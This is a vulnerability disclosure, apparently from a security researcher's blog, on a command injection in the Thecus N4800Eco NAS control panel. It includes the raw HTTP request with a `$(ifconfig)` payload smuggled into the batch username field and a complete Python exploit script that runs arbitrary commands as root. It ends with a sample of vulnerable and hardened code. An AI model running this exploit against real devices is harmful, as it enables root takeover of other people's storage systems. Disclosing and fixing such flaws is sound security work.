# Thecus N4800Eco NAS Server Control Panel Command Injection

I discovered a command injection vulnerability in the Thecus N4800Eco NAS server control panel during a penetration test. I could not analyze the source code because I did not have enough time, so I will only describe how the vulnerability was detected.

### Description

First, I tried to add a user through *Local User Configuration*, but the server did not accept special characters such as `$)(`. Users and groups can also be created through the *Batch Input* option under the *User and Group Authentication* section. I set the Batch Content to `$(ifconfig),22222,9999`, which corresponds to username, password and group name.

{% code title="Request:" %}

```
POST /adm/setmain.php?fun=setbatch HTTP/1.1
Host: target
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Origin: https://target
Connection: close
Referer: https://target/adm/index.php
Cookie: select_md=0; MYSESSID=*

batch_content=%24(ifconfig)%2C22222%2C9999
```

{% endcode %}

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-Mai69dOirBetXp-Y_fu%2F-Mai6ExqB7i_tEhJSUb6%2F1-1.PNG?alt=media\&token=2a504bc4-0c3e-4352-a8f0-bc69741654b0)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-Mai69dOirBetXp-Y_fu%2F-Mai6cPXl4ApU36QUf3W%2F2-2.PNG?alt=media\&token=5ee3753e-0d0e-4e7d-84fc-3b679616d24b)

So the filtering can be bypassed by using the *Batch Content* option to add the malicious payload as the username. After the user was added, I sent a second request to delete the `$(ifconfig)` user, and the response *Local User remove succeeds* was returned. However, the user was not deleted, which I found very interesting. I tried to understand what had happened and noticed that there is a *system log* section.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiDqIRgJs4ZH9bbyen%2F-MaiFTbORc7O-jDgi_PM%2F3-1.PNG?alt=media\&token=2f3e57f1-e825-452a-80d3-9d3cf8d2a852)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiDqIRgJs4ZH9bbyen%2F-MaiGvM6NURXxuYReF2W%2F4-1.png?alt=media\&token=222139eb-b074-45b6-9b58-f9bcf8cca54c)

Surprisingly, I saw that the `ifconfig` command had been executed.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiKlhFI5r2BBauo8Go%2F-MaiLoSVnY0LBioSVVJC%2F8-1.PNG?alt=media\&token=e45ac954-9dcd-4c87-a071-785113cc43ee)

To verify the command injection vulnerability, I tried another command, such as `id`.

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiMIoYzcA_EJNt2Fnn%2F-MaiNAKfe6a8EUpfgRX6%2F8-2.PNG?alt=media\&token=4afb5c26-b002-4b35-995b-2984875991d2)

![](https://1825299558-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MOWsiA3y7BsN5oohlsn%2F-MaiT-6iAD4WGkIDmhHI%2F-MaiUecBtiNYXyX05abI%2F8-3.PNG?alt=media\&token=06b0c494-0bc4-4ec6-b7d3-f124f7daaea3)

So there is a command injection vulnerability that allows command execution with `root` privileges. The `username` parameter of the delete request appears to be the vulnerable one: the batch import stores the `$(...)` payload as the username, and the shell expands it when that username is later passed to the delete operation. It is time to write a basic Python script.

```python
import requests
import sys
import urllib3


# If the script fails with an SSL error because the NAS only speaks old TLS:
# 1. Open /etc/ssl/openssl.cnf. At the bottom of the file you will find:
#    [system_default_sect]
#    MinProtocol = TLSv1.2
#    CipherString = DEFAULT@SECLEVEL=2
# 2. Set the value of MinProtocol to TLSv1.0
#
# Parameter names below (including "&eplang" and "catagory") are copied
# from the requests captured in the browser.


def readResult(s, target):
    """Query the system log; the injected command's output shows up there."""
    d = {
        "fun": "setlog",
        "action": "query",
        "params": '[{"start":0,"limit":1,"catagory":"sys","level":"all"}]'
    }
    url = "https://" + target + "/adm/setmain.php"
    resultReq = s.post(url, data=d, verify=False)
    tokens = resultReq.text.split()
    print("[+] Reading system log...\n")
    # Adjust the slice to the part of the log entry that holds your command output
    print(tokens[5:8])


def delUser(s, target, command):
    """Delete the user; the $(...) in the username is expanded at this step."""
    d = {
        "action": "delete",
        "username": "$(" + command + ")"
    }
    url = "https://" + target + "/adm/setmain.php?fun=setlocaluser"
    delUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Local User remove succeeds' in delUserReq.text:
        print('[+] %s command was executed successfully' % command)
    else:
        print('[-] %s command was not executed!' % command)
        sys.exit(1)
    readResult(s, target)


def addUser(s, target, command):
    """Create the user through Batch Input, which does not filter $()."""
    # username,password,group in the same form as the captured batch request
    d = {'batch_content': '%24(' + command + ')%2C22222%2C9999'}
    url = "https://" + target + "/adm/setmain.php?fun=setbatch"
    addUserReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if 'Users and groups were created successfully.' in addUserReq.text:
        print('[+] Users and groups were created successfully')
    else:
        print('[-] Users and groups were not created')
        sys.exit(1)
    delUser(s, target, command)


def login(target, username, password, command=None):
    """Authenticate to the control panel and keep the session cookie."""
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    s = requests.Session()
    d = {
        "&eplang": "english",
        "p_pass": password,
        "p_user": username,
        "username": username,
        "pwd": password,
        "action": "login",
        "option": "com_extplorer"
    }
    url = "https://" + target + "/adm/login.php"
    loginReq = s.post(url, data=d, allow_redirects=False, verify=False)

    if '"success":true' in loginReq.text:
        print('[+] Authentication successful')
    elif '"success":false' in loginReq.text:
        print('[-] Authentication failed!')
        sys.exit(1)
    else:
        print('[-] Something went wrong!')
        sys.exit(1)
    addUser(s, target, command)


def main(args):
    if len(args) != 5:
        print("usage: %s targetIp:port username password command" % (args[0]))
        print("Example: %s 192.168.1.13:80 admin admin id" % (args[0]))
        sys.exit(1)
    login(target=args[1], username=args[2], password=args[3], command=args[4])


if __name__ == "__main__":
    main(args=sys.argv)
```
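The firmware source was not available for this write-up, so the following is an added illustration, not Thecus's code, of the pattern that produces the behaviour above: a batch importer that accepts any username, and a delete routine that interpolates that username into a shell command. It uses `echo` in place of the real user-deletion tool so it runs anywhere, and the username allowlist is an assumption (the page only shows that the Local User form rejected `$)(`). The two hardened variants beside it are what a fix would look like: shell-quoting the value (the Python equivalent of PHP's `escapeshellarg`), or validating it and passing an argument vector so no shell is involved.

```python
import re
import shlex
import subprocess

# Constructed sample batch line in the format the page describes
# (username,password,group); not captured from a real device.
SAMPLE_BATCH_LINE = "$(id),22222,9999"

# Assumed allowlist for usernames. The page only shows that the Local User
# form rejected "$)(", so this rule is an illustration, not the NAS's check.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def parse_batch_line(line):
    """Split a batch line into its three fields, as the importer appears to."""
    fields = line.split(",")
    if len(fields) != 3:
        raise ValueError("expected exactly username,password,group")
    username, password, group = fields
    return {"username": username, "password": password, "group": group}


def is_valid_username(name):
    """Allowlist check that must run on every path that creates a user,
    the batch importer included, not only on the Local User form."""
    return USERNAME_RE.fullmatch(name) is not None


def delete_user_vulnerable(username):
    """Vulnerable pattern: the username is interpolated into a shell string.
    With shell=True the shell expands $(...) before the command ever sees it."""
    cmd = "echo " + username
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


def delete_user_quoted(username):
    """Hardened variant 1: shell-quote the value (shlex.quote plays the role
    of PHP's escapeshellarg), so $(...) stays a literal string."""
    cmd = "echo " + shlex.quote(username)
    return subprocess.run(cmd, shell=True, capture_output=True,
                          text=True).stdout.strip()


def delete_user_hardened(username):
    """Hardened variant 2: validate against the allowlist and pass an argv
    list, so there is no shell at all and nothing to expand."""
    if not is_valid_username(username):
        raise ValueError("invalid username: %r" % username)
    return subprocess.run(["echo", username], capture_output=True,
                          text=True).stdout.strip()


if __name__ == "__main__":
    user = parse_batch_line(SAMPLE_BATCH_LINE)["username"]
    print("batch username :", user)
    print("vulnerable     :", delete_user_vulnerable("$(echo injected)"))
    print("quoted         :", delete_user_quoted("$(echo injected)"))
    try:
        delete_user_hardened(user)
    except ValueError as err:
        print("hardened       :", err)
```

Running it shows the core of the bug: the vulnerable path prints `injected` because the shell evaluated the substitution, the quoted path prints the literal `$(echo injected)`, and the allowlisted path refuses `$(id)` before any command is built. Note that validating only one input form, as the Local User page did, leaves every other path that reaches the same shell call (here the batch import) exploitable.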

{% embed url="https://www.youtube.com/watch?v=jf_eVWd3A0E" %}

Author: Metin Yunus Kandemir
